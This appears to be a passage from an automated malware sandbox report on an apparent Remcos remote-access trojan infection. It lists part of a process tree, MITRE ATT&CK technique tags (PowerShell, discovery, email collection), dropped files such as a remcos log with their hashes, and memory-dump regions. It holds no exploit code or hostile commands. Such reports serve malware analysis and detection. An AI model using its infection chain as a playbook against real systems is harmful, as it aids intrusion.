        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:1284
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4928

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4292

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
218B

MD5
6e9634bd04226b0f4433ff244eb8ae02

SHA1
62201cc725c527d239f40024ce71a9e65b83ad63

SHA256
6230f05e720a999f4e432f808f74e9a32624d69f9e3cd31a382388b0b7511f42

SHA512
94d38cb81ebfe1f01318dd5106bb534880a84bc6b126ef3633b5b77236c1723a45b73a2ceba910731c29456e9823afac545aae98eb27519cc04206abbb787f8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c2d9eeb3fdd75834f0ac3f9767de8d6f

SHA1
4d16a7e82190f8490a00008bd53d85fb92e379b0

SHA256
1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66

SHA512
d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e55832d7cd7e868a2c087c4c73678018

SHA1
ed7a2f6d6437e907218ffba9128802eaf414a0eb

SHA256
a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574

SHA512
897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
67KB

MD5
016dff91d6ae8399e813dc1bb26c4bcb

SHA1
a2511382dcb873c181550df3311caec6f39cd362

SHA256
27019bd7fe160276837ed596cf93ce7344111e90474f966db5816685af43f6a8

SHA512
51e667da1dfe37f589b7dbb09c548c3bf1f6fd5e822002239518bbe72884e911bd59f390d5147b0b1fa6f1eed0098a29a188bf0081d52337200701afbdde04dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
468KB

MD5
05cdea4d109041cf23e65a8ac4f30d76

SHA1
d8e7fb694171569c52b2c4effd404615889ca2a9

SHA256
24f96398d643be9eb81a51af919991ab5734c5ecef5924caa10874c413905895

SHA512
8ce130c91439deff055c2e6e4952063850973ae4e864254bc07a92bc55be39fa74e0ef148ac8aad8277458ecc21dc2a49d72ad45f6cc87735c4293259a340eab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
88KB

MD5
eb954771323a0888c9d94587e148ef49

SHA1
a12c902a3e0994ddea467afd3b71cd5c7ef57732

SHA256
2f30a1394e5448bc8523a7a9e46b772215031a8098d59f68740684d0d3f7e7a0

SHA512
5142d47952bcad42e3b6ab8d5b3c82bdcecc0cab5fa909e9c4154d8e7f9e96bfeb09522b4173db22f962a25824d8938dd66dd72409ed6b6df98dccb65ab86cad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
79KB

MD5
e51f388b62281af5b4a9193cce419941

SHA1
364f3d737462b7fd063107fe2c580fdb9781a45a

SHA256
348404a68791474349e35bd7d1980abcbf06db85132286e45ad4f204d10b5f2c

SHA512
1755816c26d013d7b610bab515200b0f1f2bd2be0c4a8a099c3f8aff2d898882fd3bcf1163d0378916f4c5c24222df5dd7b18df0c8e5bf2a0ebef891215f148e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
34KB

MD5
522037f008e03c9448ae0aaaf09e93cb

SHA1
8a32997eab79246beed5a37db0c92fbfb006bef2

SHA256
983c35607c4fb0b529ca732be42115d3fcaac947cee9c9632f7cacdbdecaf5a7

SHA512
643ec613b2e7bdbb2f61e1799c189b0e3392ea5ae10845eb0b1f1542a03569e886f4b54d5b38af10e78db49c71357108c94589474b181f6a4573b86cf2d6f0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
17KB

MD5
240c4cc15d9fd65405bb642ab81be615

SHA1
5a66783fe5dd932082f40811ae0769526874bfd3

SHA256
030272ce6ba1beca700ec83fded9dbdc89296fbde0633a7f5943ef5831876c07

SHA512
267fe31bc25944dd7b6071c2c2c271ccc188ae1f6a0d7e587dcf9198b81598da6b058d1b413f228df0cb37c8304329e808089388359651e81b5f3dec566d0ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
259KB

MD5
34504ed4414852e907ecc19528c2a9f0

SHA1
0694ca8841b146adcaf21c84dedc1b14e0a70646

SHA256
c5327ac879b833d7a4b68e7c5530b2040d31e1e17c7a139a1fdd3e33f6102810

SHA512
173b454754862f7750eaef45d9acf41e9da855f4584663f42b67daed6f407f07497348efdfcf14feeeda773414081248fec361ac4d4206f1dcc283e6a399be2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
18KB

MD5
74f49bcdbd13777670657d78944e97f8

SHA1
862256addfc55950fa4b4da43e5619c24722bd31

SHA256
1f4aa7693f801ea02e189c3b85101e1a5c24ffd6c335d54d1b212f9981ea3f05

SHA512
c699383350446f3f665418edaf74e4e235532963801ce3c9fd57f49526aeb9b8fb6cb28fd9bb0a3e65a0521029b4d1821eade0e8a5d56eeafdca244650dd9f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
32KB

MD5
64d3be46eb793f6fe19bee805638cb80

SHA1
93bd75cf654214f8a76af8e1290499147d971c5c

SHA256
74c048fd2c6c9516438db1f627419a783622abcdc0522a5c4a1a568317a3d13c

SHA512
4646ac163dcc465669a868003b2667752eef8cad1f40dbff48c7f5d4c5f2120637f2514a0202f2008d52edfb377d1341d1b0411e556011ce9e2de194ee405908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\343d32232527453a_0

Filesize
1.3MB

MD5
ce21c94d283a667f72cfe5617bf54e02

SHA1
2657539386e83158f3edb21975ef5b82d12868c3

SHA256
438a0f7955b25466d08bbef0a4aceefb16cf830d8ae83697ec01e302eb79d54c

SHA512
522936d2d6579d0d3c9331171470472c5919a6b49a859feac9932505cfb5b2f86d8ccc54c0853b3a2f68a70e60eca6969f5c57158821f9ff3d8845c6ce70641d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3ab592dde6ff023e_0

Filesize
272B

MD5
a8f30e275a6241073e7b1768e109e079

SHA1
1f3737a27b3e0026239b7e43d4bac1108ef06adc

SHA256
8e45debc21ce6af0792c18ab1b7f3690e15c67887369cd0d3325fac61a313a38

SHA512
7b4ddf2b053fb80b324b3f49976f80edb11689628c272fe335ab4a01df3f83e073b51f09919a8888344a90006e152c79d9facb8a5505f0d8457250b3d0c8817e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3c2e2df244c93d68_0

Filesize
297B

MD5
44e4e9b55b12e99d42211ef420b840a8

SHA1
ffcccf9a70aaa1219686f4699c65c21b08046ed0

SHA256
8e364bb7f3dcf7ec6071922c65c438674c929664fb126e3304080d1054609614

SHA512
e616c6fc83187af8a79a2a28602d335b1690613a263077ca05f7c281b59c042c629da1438bc6af536180d0a035592c6eb6bab6d2fa8c17c773b9d8d164bc30ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5703d5a7bf2ea7d5_0

Filesize
188KB

MD5
21be15fab762bb6b6b3c9d5ef0c64858

SHA1
0e4dc4353e055cddbd8c99658c521ebea9fbddae

SHA256
d95475a102476b23304c683686b75883fd2850dd001313afa4de3d7cbfa2073c

SHA512
646135c7ac6e902e823ccd5f1848f9b3a5c74e7c8c2af59d40bb4dcdccdb59220cefeac374592459f7aaaf55662a4d8b799fc90abea409d5fc2dc7ac5ae3232c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\67c896e8aae559d2_0

Filesize
291B

MD5
05be6689723efa277c9744366c070b83

SHA1
4976d6f4a9625e07a024ceaf6e1e75056505bdcc

SHA256
4cf684a466d449ff7855999d05e15236d676f5f1aadc7054f0d9c523d5bcfbea

SHA512
71c040e63be29765b64f58f705f6db5007af3126f43c439d2e7abf0f2362e69d2f277a09f1813dd40bce81ad53c0097c5cfb90007143003fb7d502bffb314fcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8863eadbd1bc1fc3_0

Filesize
1KB

MD5
81efb23691b09bcab0da24718889e73e

SHA1
4dc451f2e9006a3091185ea59b3e3f7cb6546f69

SHA256
d71fb73468dbc3118ccc9d27eada14a80e7589fd27d07d9973916e580faf35de

SHA512
6c2f537255b2640e525beb1541f4a447b6b8493e45e1aca60f18f1941edfa130f4774685d3f99a378fe2f5e26cfd0bfa3d28e05c36f0165e0b2f5fde6c825bf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c10c7cca573d202e_0

Filesize
1.1MB

MD5
365311acc71a21576def80c75902b4b8

SHA1
3d2e5ef080572d89dfde03405084f4413a888081

SHA256
11a8268c9b05af38aebb7a968ae7fa736fd3d77c81f804588c190bda19611aa8

SHA512
6015cc9f70f6458644e5fa71020b193edc44efc2d4d3e41e95201cf9caf1261ca48d3f7c42246779d98819f56517812a893b7f8ce361f635d87feb154f221c8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e1bf51ec77e9a0ef_0

Filesize
295KB

MD5
19f6f62405fbb669f53edb12e14da333

SHA1
2dd7cf7fdb73a2c8b69b0a260051584ed59507d7

SHA256
b705d50e1c2dc19565e23a9ff683789bb2839d22cf44d7f1202cc7e49d74840f

SHA512
0ee72bcfb8afcaed9a7eeeee8aa548450e61458a46c48e55660bc8c75ad67caafa0863e5044f3d4ceb1228b0a8017a475791a1f76cee4c7195fc9ed5252f1bf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f29ed5b5251e1eaf_0

Filesize
269B

MD5
dfd777c642fb80381283519311e8f81d

SHA1
3012d23c07a0f76f3b5831e5dca4b2d6ef5d78d6

SHA256
355c07a1a999ae11aa6c4bd561366df7a58e1d1673a403dcfa62da952c78313d

SHA512
f4230cd4dde41e4eb595b372f29ab427e65d8e54a4a017c43d10997cf13eb5fa7b908ca6d6341dca730fa978769ed535b12d476922c503fbde4eb3dd0770bf3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
437B

MD5
05592d6b429a6209d372dba7629ce97c

SHA1
b4d45e956e3ec9651d4e1e045b887c7ccbdde326

SHA256
3aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd

SHA512
caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
953e3ec5abf624ba51613e68ec5c666a

SHA1
def750efe4803f0386834456bf2af5bfe1829d89

SHA256
80d1fcfe0bee228246ccaa45c947021417ae797845b856c5caca7144813a7f92

SHA512
f138d8cd1d79d6b220b71cc28f62b203aca28bb85b1fe72ced61c8bca859bb2363d3698edd609861aca6cc02dc32c5600d3fd15e5b3d3cd3d206fd858410fddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b361ea52454dc7d71581288e51b940de

SHA1
668ffb3c651a47d557ee70caec85c25dffad26ee

SHA256
2df4c630440d086925cd6145b8291cab862cf2a6adf3bc424d6d3ab921fe80ff

SHA512
86b3f4e29e37a13a8d5a74d68eea19221b05d50d7931b0a1cba9bbf614763a5ff9c88ff477099e99d408cd2f43401a774fc9f2fc0e2bcff8e0237fb197ac91a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
b5198fae34671ae913c7cea30ec91396

SHA1
7f381a882296c8c6cd68160e08c6b5dd80c3ab54

SHA256
f4b02ae46efc3c4c72c7517dd79c7f08ad5e053e51c8c9cc82e75bb67ac884dc

SHA512
d51bdcaed3e5c81d47e8da894c62ea6d46ac8be0dc793b83335448d709b637d2ae0fc0db4ca9b26e72afff1dc802a6ed741aaa6496d48145af818dc87a62d540

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7f7e1b7be1c2ee650a1bb4cc0618177a

SHA1
266dba82e6942f98212ca46c8bbb923647212948

SHA256
43434e752c29a1a5527545dc0f56c9743e39ad0681356c9e0cf9e990c9e6851a

SHA512
0f9486a7b0d8bc200a95a258ec6a1963c62e467717121dd9f4008a2d3144378181d706ac38dd441fb534bb6b7f72bfb721632bb979b5e3802f5d882cea1728ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4b3f2a14094fea947c9705bda98d98b9

SHA1
984a40b712526df35957641d004686bfaa52f3f4

SHA256
47a4a01d09126ab142e6be5fe1c6aa5c183cbf18bed17672e861fe831b3b83e5

SHA512
c496d7e19a2235c46fb79305a1e0d4eb968b3f5b8884a53b0a43b1c6db63ddc23bb569b9c93ac3e7aee08a24f2586900d0e696d0872ab844e29b3ac0195d00b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a760bfc67a1bfba3515a476d6105b041

SHA1
5558396fbb48db3812e72cd48485bdb2110a4752

SHA256
9e4f69eab2bc9b04901dded3608494b6a88354c30675940d67f8e921067c4310

SHA512
a7039c3a5161e1445d1dea3a25d290aefb097e3bebab86e6d71fa719856681cc28610b9b2eb43410350aa7b426156e6a3565ce6144612655c3262aff5fc61790

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
fcb7d34c4f0f5c494e71a02107009b6a

SHA1
b5173fb2631dba8cc70c11178b522d998bcddcf1

SHA256
35fb8e5fa19377c5ce301017fb2c64d36b4cfa396bae0aed50d5f15bd88759cf

SHA512
5d73811eff364ba3b7b89de750cbc106c0f6bc06dcf97fa58210c152e305cba36cc8ce908d50c1100761d8466c8e9e40b58351d2b04af36403390688a518c17a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d25d6e642c4ac0f4f9b504d99e041f8e

SHA1
ff15c278d5b580bf1190344ba11d718b384d6da9

SHA256
9322f53c93cbf309179bfafe94cc9c77f0f130cf030033f53a56a42794f82908

SHA512
d14354c219d249eed52863f0e0bf00d8b23d3c7f0d539eb30c1934ec4011a88539287a7ff40bed2a7baa7bc4f26ddcf1c0e0cd649c7d194c752a8b5ccb975762

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
849a10c867e9eb87dc5d80ed8bbaf05b

SHA1
2932524c7396b502e898fc2bd13363c84563b590

SHA256
9168fa776e4df41750700b4244e23b37aa95c7285d7d94fc05fc68631e4227ee

SHA512
c55487fb444d4218f54ee7fa549bbed02eea9470f452d4afc7f2337db223f25e9308aaefe9101c229d6bcd037375d225ded1782d9e6aabea31af918028c74475

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
b5343d3c19c34b2a949049abca613d5c

SHA1
f05d821846182b423a42be877c3272a2e26b524d

SHA256
ae1b32ff8505de493aba51c14ffc2d739da6542b7cbbb94e6c548ad25c261650

SHA512
6d36bec37a503bc322cc19ea1848d4b1a7b030c0c91996724d0f85fb193a041f79f6ea4e9fd3f84ac954bc45645afb1256feeb5b40105943f529c4b204bd0d5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
1ecb8560cef61a1be39a3af090e9f04e

SHA1
c0ce7fe2a4fc86062b6818eed6b803c60e870295

SHA256
1daa8889cc74c4f785c4454d738a48269850a30cbc7322a5aa513bc0990d0088

SHA512
20474a8ad63bc2bdc9b56d2dd6f5647d55f75605f5e37a5314309d3e7d7e5fcb5eebf5b29427c3c7346ddec49e5528345534e7c6c6dbca5df2b548829280e138

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
4ae16b95b4cec8ec962a85f1b5a2f424

SHA1
3e95db93c333b4a30daa66819c205cf0293b3527

SHA256
2a8f46fbac6c9236c8e672e122daa374587135829e90aebaa9157aba32f91e72

SHA512
b7426bf82fe0ecb8f30faab9c9a911f3fd5357e55c2b4857c4b34b80574a6d937d8cf9f40fce1838f244468fb7666279f8cf06285d1a10b4720bb55ab154d4a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
7065ff88ca86c8e7564ff229c26290c7

SHA1
fa66707c98c2c80ea6013326d8539650d363329b

SHA256
77499227759b3e515262e46ba70b6706d79a7c3f33361b9f90a29c8ab384eef5

SHA512
98dd66a181c32dc7fe789aaa4d4c95040374f78dfce576c5fd646d370bbf2b0734465ac2e62d0b6adcd956e01c71e49daf2ffc1a61cc595464b83437c9da8614

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
0531a51f3cb76a40798666db5cdbb1cd

SHA1
912f2c3dc4cc9b36ff319cad9512ae4373f765d4

SHA256
0f9e5e6c8cfe5109d719653bdabecc33c2bc730e39f845fc3ca4e35961e279a8

SHA512
ca7023039d60e25dabcaee7169261f65c35af9f9a4ff4b06a5ac27355c34d195a9ea236b5958959833bd3bdcca0cdf9231d932a653ff9b0e6ca6889b39957cb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
367B

MD5
359becb780178fce556d4aed57cc1c2e

SHA1
e219e6b5dd444a360da7611eeaac55f2db84f6f0

SHA256
edef60736034b77e59098dc3c1939d4619b84a56bab62da4b316e1c3635effe7

SHA512
065e4fe84261f96a0e833ed0e5d1d29b78e1e500b6a249c4e5b2a98df6f4f9227f51ede9c72272e7cab820bade42c7f2214b1840d4b65fdfe46243328ac825c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585e57.TMP

Filesize
371B

MD5
c9b4808ed8840aee6c1cf2152910f802

SHA1
1af6d3c3480e9f2860df4fdf83a3db16d2c71bdb

SHA256
4beeca79875474c99fc226eeae8c52dd4009642e5bdcfc3af0f0e1f6bf8e5b6a

SHA512
8167ce88cb19e99d42305f1849cc2137db08e6f853160625e2b1b8ce7399ca5363196cbd5acc433aab9344419ff5f83516250048749debd2b8dfd85dd3d53774

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1ff1ee2f9b292bb96b2cc8b4f903246e

SHA1
b8d18b012f75776496219b103a9325fdec5d92d6

SHA256
e4f19dd5332849ecd0d4537f0834f90e8c19fdb1a0162eeef7bf530be1107048

SHA512
4c1b0f343e99fc4b0983938add20a9c7a79e7dc76d951ed52da4f579a9569aa405ea8c989caadfc67283bd7a554f964cac602150afa738a39c2b4cfc72444cbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
6b28593f7a6d681bfe279a6e0d7e1c58

SHA1
3e5a4c875170db9acc009db85a5448f2d20adf53

SHA256
016a940a2451e92826e5d994dba47fe7a0ae54d5c136495d8b41a32dec7240d8

SHA512
b5de61bb28c4cd87b33878fa3a370514e6c247baf2f2bb08b395b3f8eabf876b67fa5498e6c298bf9e24cf92b3b9fc8506cf9eb3dc4d5c577ea837dc5f59da76

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k40gto1v.av1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hewjxrtbjaldc

Filesize
4KB

MD5
60a0bdc1cf495566ff810105d728af4a

SHA1
243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6

SHA256
fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2

SHA512
4445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5

Download Submit
memory/332-49-0x0000000000150000-0x000000000015C000-memory.dmp

Filesize
48KB

Download
memory/1496-116-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1496-120-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1496-115-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2152-114-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2152-109-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2152-112-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2156-693-0x00000000010E0000-0x00000000010EC000-memory.dmp

Filesize
48KB

Download
memory/2404-12-0x00007FFA28110000-0x00007FFA28BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2404-7-0x000002A0457D0000-0x000002A0457F2000-memory.dmp

Filesize
136KB

Download
memory/2404-1-0x00007FFA28113000-0x00007FFA28115000-memory.dmp

Filesize
8KB

Download
memory/2404-13-0x00007FFA28110000-0x00007FFA28BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2404-16-0x00007FFA28110000-0x00007FFA28BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2404-17-0x00007FFA28110000-0x00007FFA28BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2524-264-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-52-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-790-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-265-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-57-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-791-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-39-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-41-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-44-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-47-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-50-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-51-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-460-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-461-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-53-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-54-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-83-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-129-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-629-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/2524-628-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3224-111-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3224-113-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3224-110-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3620-266-0x0000000000F90000-0x0000000000F9C000-memory.dmp

Filesize
48KB

Download
memory/3988-481-0x00000000010A0000-0x00000000010AC000-memory.dmp

Filesize
48KB

Download
memory/4256-38-0x00000208DAE40000-0x00000208DB288000-memory.dmp

Filesize
4.3MB

Download
memory/4292-159-0x0000000000D50000-0x0000000000D5C000-memory.dmp

Filesize
48KB

Download
memory/4928-796-0x00000000001A0000-0x00000000001AC000-memory.dmp

Filesize
48KB

Download
memory/5908-365-0x00000000002A0000-0x00000000002AC000-memory.dmp

Filesize
48KB

Download
memory/5976-593-0x00000000002D0000-0x00000000002DC000-memory.dmp

Filesize
48KB

Download